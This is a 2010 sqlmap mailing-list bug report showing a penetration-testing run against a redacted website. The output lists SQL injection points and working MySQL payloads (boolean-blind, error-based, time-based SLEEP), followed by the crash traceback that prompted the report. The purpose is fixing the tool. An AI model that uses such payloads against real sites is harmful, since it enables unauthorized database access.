[sqlmap-users] a new and i hope the last bug for 2010
Brought to you by:
inquisb
From: <ra...@jo...> - 2010-12-31 19:11:31
|
C:\pentest\sqlmap-0.9>sqlmap -u "http://xxxxxxxxxxxxxxxxxxxx.xxx/retrievePhoto.php?fid=236" --auth-type=basic --auth-cred=xxxx:xxxx -a C:\user-agents.txt --level 5 --risk 3 -x c:\xxxxx sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 19:40:11 [19:40:12] [INFO] fetched random HTTP User-Agent header from file 'C:\user-agents.txt': Opera/9.00 (Wii; U; ; 1038-58; Wii Shop Channel/1.0; en) [19:40:12] [INFO] using 'C:\pentest\sqlmap-0.9\output\xxxxx.xxxx\session' as session file [19:40:15] [INFO] resuming injection data from session file [19:40:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file [19:40:15] [INFO] resuming back-end DBMS 'mysql 5' from session file [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file [19:40:15] [INFO] resuming back-end DBMS operating system 'None' from session file [19:40:53] [INFO] testing connection to the target url sqlmap identified the following injection points with 0 HTTP(s) requests: --- Place: GET Parameter: fid Type: boolean-based blind Title: AND boolean-based blind - WHERE clause Payload: fid=236" AND 7994=7994 AND "zBkq"="zBkq Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE clause Payload: fid=236" AND (SELECT 1744 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,115,110,58),(SELECT (CASE WHEN (1744=1744) THEN 1 ELSE 0 END)),CHAR(58,113,104,110,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND "EkEX"="EkEX Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: fid=236" AND SLEEP(5) AND "Ftwr"="Ftwr --- [19:40:55] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.6 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap-0.9\sqlmap.py", line 80, in main start() File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", line 387, in start __showInjections() File "C:\pentest\sqlmap-0.9\lib\controller\controller.py", line 121, in __showInjections dumper.technic(header, data) File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 93, in technic self.string(header, data) File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 65, in string self.__write("%s:\n---\n%s\n---\n" % (header, data)) File "C:\pentest\sqlmap-0.9\lib\core\dump.py", line 38, in __write self.__outputFP.write(text) AttributeError: 'NoneType' object has no attribute 'write' C:\pentest\sqlmap-0.9> I wish you all a Happy New Year :) |